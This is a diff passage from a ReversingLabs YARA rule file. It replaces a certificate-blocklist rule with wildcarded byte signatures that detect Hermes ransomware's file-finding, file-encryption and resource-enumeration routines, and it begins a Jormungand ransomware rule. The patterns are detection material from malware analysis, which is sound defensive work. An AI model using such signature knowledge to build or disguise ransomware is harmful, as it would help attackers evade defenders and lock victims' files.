+            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75
+            ?? FF 75 ?? E8
+        }
+		$hermes_encrypt_files_v1_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53
+            FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56
+            6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56
+            FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ??
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ??
+            ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
+        }
+		$hermes_encrypt_files_v1_p2 = {
+            C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56
+            56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ??
+            ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75
+            ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15
+            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ??
+            53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF
+            75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9
+        }
+		$hermes_enum_resources_v1 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
+            43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59
+            85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B
+            4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ??
+            4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F
+            85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E
+            5B C9 C3 33 C0 40 EB
+        }
+		$hermes_encrypt_files_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB
+            AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ??
+            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33
+            C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74
+            ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45
+            ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ??
+            81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ??
+            89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ??
+            C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ??
+            72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9
+        }
+		$hermes_encrypt_files_v2_p2 = {
+            77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ??
+            0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39
+            45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ??
+            83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ??
+            89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ??
+            ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ??
+            ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8
+            ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45
+            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ??
+            ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45
+        }
+		$hermes_encrypt_files_v2_p3 = {
+            50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ??
+            39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89
+            45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ??
+            ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ??
+            E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
+            D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D
+            ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ??
+            ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7
+        }
+		$hermes_encrypt_files_v2_p4 = {
+            45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B
+            CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB
+            AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ??
+            AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D
+            45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A
+        }
+		$hermes_encrypt_files_v2_p5 = {
+            FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89
+            7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ??
+            ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ??
+            76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50
+            6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF
+            15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ??
+            53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3
+            EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ??
+            ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ??
+            ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$hermes_find_files_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83
+            FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83
+            F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D
+            85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A
+            ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
+            66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89
+        }
+		$hermes_find_files_v2_p2 = {
+            45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45
+            ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ??
+            66 89 55 ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ??
+            66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ??
+            ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ??
+            89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45
+            ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
+            66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58
+            66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A
+            ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D
+            ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D
+        }
+		$hermes_find_files_v2_p3 = {
+            AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0
+        }
+		$hermes_find_files_v2_p4 = {
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ??
+            ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53
+            E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$hermes_enum_resources_v2 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ??
+            ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ??
+            6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66
+            39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF
+            75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ??
+            ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3
+            33 C0 40 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Teleneras MB" and pe.signatures [ i ] . serial == "03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $hermes_find_files_v1_p* ) ) and ( all of ( $hermes_encrypt_files_v1_p* ) ) ) or ( ( all of ( $hermes_find_files_v2_p* ) ) and ( all of ( $hermes_encrypt_files_v2_p* ) ) ) ) and ( any of ( $hermes_enum_resources_v* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Jormungand ransomware."
 		author = "ReversingLabs"
-		id = "593c1799-a5df-5b3e-8a8b-826d808a14f0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4"
+		date = "2021-10-22"
+		modified = "2021-10-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3808-L3826"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1"
+		logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jormungand"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drop_ransom_note = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
+            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
+            ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89
+            84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ??
+            89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ??
+            8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
+            ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
+            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89
+            5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ??
+            8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C
+            24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D
+            44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ??
+            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ??
+            89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? C3 E8
+        }
+		$encrypt_files_aes = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24
+            ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
